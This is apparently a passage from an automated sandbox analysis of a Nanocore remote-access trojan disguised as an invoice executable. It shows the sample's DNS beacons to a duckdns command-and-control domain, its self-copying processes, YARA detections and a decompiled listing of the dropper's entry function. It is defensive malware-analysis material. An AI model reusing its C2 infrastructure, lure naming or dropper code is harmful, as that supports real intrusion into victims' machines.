Jan 13, 2022 15:33:20.093357086 CET	57106	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:20.112741947 CET	53	57106	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:26.943756104 CET	60352	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:27.058038950 CET	53	60352	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:33.189743996 CET	60982	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:33.209614038 CET	53	60982	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:39.395334959 CET	58058	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:39.414510965 CET	53	58058	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:46.968370914 CET	64367	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:47.081903934 CET	53	64367	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:53.528749943 CET	51539	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:53.548517942 CET	53	51539	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:59.952053070 CET	55393	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:59.971908092 CET	53	55393	8.8.8.8	192.168.2.3
Jan 13, 2022 15:34:06.225054026 CET	50585	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:34:06.244513035 CET	53	50585	8.8.8.8	192.168.2.3
Jan 13, 2022 15:34:12.427901983 CET	63456	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:34:12.542040110 CET	53	63456	8.8.8.8	192.168.2.3
Jan 13, 2022 15:34:18.793152094 CET	58540	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:34:18.907707930 CET	53	58540	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2022 15:32:22.209491968 CET	192.168.2.3	8.8.8.8	0x4721	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:28.565608978 CET	192.168.2.3	8.8.8.8	0x8fea	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:35.717637062 CET	192.168.2.3	8.8.8.8	0xdeca	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:41.991347075 CET	192.168.2.3	8.8.8.8	0x4167	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:48.289732933 CET	192.168.2.3	8.8.8.8	0x4bf8	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:54.779721975 CET	192.168.2.3	8.8.8.8	0x7c96	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:01.219548941 CET	192.168.2.3	8.8.8.8	0x8b00	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:07.577388048 CET	192.168.2.3	8.8.8.8	0x7c76	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:13.824532986 CET	192.168.2.3	8.8.8.8	0x4c89	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:20.093357086 CET	192.168.2.3	8.8.8.8	0x847	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:26.943756104 CET	192.168.2.3	8.8.8.8	0x9ddc	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:33.189743996 CET	192.168.2.3	8.8.8.8	0x2b96	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:39.395334959 CET	192.168.2.3	8.8.8.8	0x5a8	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:46.968370914 CET	192.168.2.3	8.8.8.8	0xff75	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:53.528749943 CET	192.168.2.3	8.8.8.8	0x5d02	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:59.952053070 CET	192.168.2.3	8.8.8.8	0x491c	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:06.225054026 CET	192.168.2.3	8.8.8.8	0x779a	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:12.427901983 CET	192.168.2.3	8.8.8.8	0x2f7	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:18.793152094 CET	192.168.2.3	8.8.8.8	0x890f	Standard query (0)	boyhome5100.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 13, 2022 15:32:22.405813932 CET	8.8.8.8	192.168.2.3	0x4721	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:28.585058928 CET	8.8.8.8	192.168.2.3	0x8fea	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:35.830668926 CET	8.8.8.8	192.168.2.3	0xdeca	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:42.010797024 CET	8.8.8.8	192.168.2.3	0x4167	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:48.402158022 CET	8.8.8.8	192.168.2.3	0x4bf8	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:32:54.892461061 CET	8.8.8.8	192.168.2.3	0x7c96	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:01.332628012 CET	8.8.8.8	192.168.2.3	0x8b00	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:07.691279888 CET	8.8.8.8	192.168.2.3	0x7c76	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:13.938371897 CET	8.8.8.8	192.168.2.3	0x4c89	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:20.112741947 CET	8.8.8.8	192.168.2.3	0x847	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:27.058038950 CET	8.8.8.8	192.168.2.3	0x9ddc	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:33.209614038 CET	8.8.8.8	192.168.2.3	0x2b96	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:39.414510965 CET	8.8.8.8	192.168.2.3	0x5a8	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:47.081903934 CET	8.8.8.8	192.168.2.3	0xff75	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:53.548517942 CET	8.8.8.8	192.168.2.3	0x5d02	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:33:59.971908092 CET	8.8.8.8	192.168.2.3	0x491c	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:06.244513035 CET	8.8.8.8	192.168.2.3	0x779a	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:12.542040110 CET	8.8.8.8	192.168.2.3	0x2f7	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)
Jan 13, 2022 15:34:18.907707930 CET	8.8.8.8	192.168.2.3	0x890f	No error (0)	boyhome5100.duckdns.org	194.5.98.28	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964 Parent PID: 5748

General

Start time:	15:32:13
Start date:	13/01/2022
Path:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092 Parent PID: 6964

General

Start time:	15:32:15
Start date:	13/01/2022
Path:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: chmac.exe PID: 6288 Parent PID: 3352

General

Start time:	15:32:25
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: chmac.exe PID: 6556 Parent PID: 6288

General

Start time:	15:32:27
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: chmac.exe PID: 6760 Parent PID: 3352

General

Start time:	15:32:34
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: chmac.exe PID: 6820 Parent PID: 6760

General

Start time:	15:32:36
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Imagebase:	0x400000
File size:	663115 bytes
MD5 hash:	D272E884F59FF9D7921619F88766709D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964 Parent PID: 5748 G2M8C76V_INV0ICE_RECEIPT.exeCOMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	6.9%
Signature Coverage:	22.3%
Total number of Nodes:	1345
Total number of Limit Nodes:	25

Executed Functions

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
